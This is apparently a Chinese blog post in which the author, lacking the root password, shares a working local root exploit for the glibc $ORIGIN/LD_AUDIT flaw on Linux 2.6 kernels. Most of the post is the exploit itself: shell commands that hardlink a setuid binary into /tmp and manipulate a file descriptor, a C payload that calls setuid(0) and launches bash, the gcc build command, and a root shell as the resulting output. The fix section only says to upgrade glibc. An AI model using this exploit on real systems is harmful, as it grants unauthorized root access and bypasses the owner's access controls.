linux2.6内核本地提权,低权限获取root

前言:额、一台linux 服务器PHP 版本太低。。需要升级才能使用ThinkPHP框架,可是我没有root密码,无法升级,虽然是在虚拟集群中的服务器,但是也没有集群的密码,如果直接用修改启动项方式去修改root密码的话,1是太麻烦,2是额、技术含量也太低 。。经过一番百度、Google,发现2.6的内核有一个漏洞, N次失败之后终于找到一能用的神器。操作过程如下。。    神奇的让$---变成->#    

我也不懂什么意思,,直接上代码:


It is possible to exploit this flaw to execute arbitrary code as root.

Please note, this is a low impact vulnerability that is only of interest to
security professionals and system administrators. End users do not need
to be concerned.

Exploitation would look like the following.

# Create a directory in /tmp we can control.

$ mkdir /tmp/exploit  

# Link to an suid binary, thus changing the definition of $ORIGIN.

$ ln /bin/ping /tmp/exploit/target  

# Open a file descriptor to the target binary (note: some users are surprised

# to learn exec can be used to manipulate the redirections of the current

# shell if a command is not specified. This is what is happening below).

$ exec 3< /tmp/exploit/target  

# This descriptor should now be accessible via /proc.

$ ls -l /proc/$$/fd/3

lr-x------ 1taviso taviso 64Oct 1509:21/proc/10836/fd/3->/tmp/exploit/target*

# Remove the directory previously created

$ rm -rf /tmp/exploit/

# The /proc link should still exist, but now will be marked deleted.

$ ls -l /proc/$$/fd/3

lr-x------ 1taviso taviso 64Oct 1509:21/proc/10836/fd/3->/tmp/exploit/target (deleted)

# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().

$ cat >payload.c

void  __attribute__((constructor))   init()

{

            setuid(0);

            system("/bin/bash");

}


#此处有一个回车

#(此处ctrl+c结束 )


$ gcc -w -fPIC -shared -o /tmp/exploit payload.c

$ ls -l /tmp/exploit

-rwxrwx---1taviso taviso 4.2K Oct 1509:22/tmp/exploit*


# Now force the link in /proc to load $ORIGIN via LD_AUDIT.

$ LD_AUDIT="\$ORIGIN"  exec  /proc/self/fd/3

sh-4.1# whoami

root sh-4.1# id

uid=0(root)gid=500(taviso)

漏洞解决方法(这是由GCC引发的一个漏洞):
升级:glibc、


你可能感兴趣的:(linux,root,提取,破解)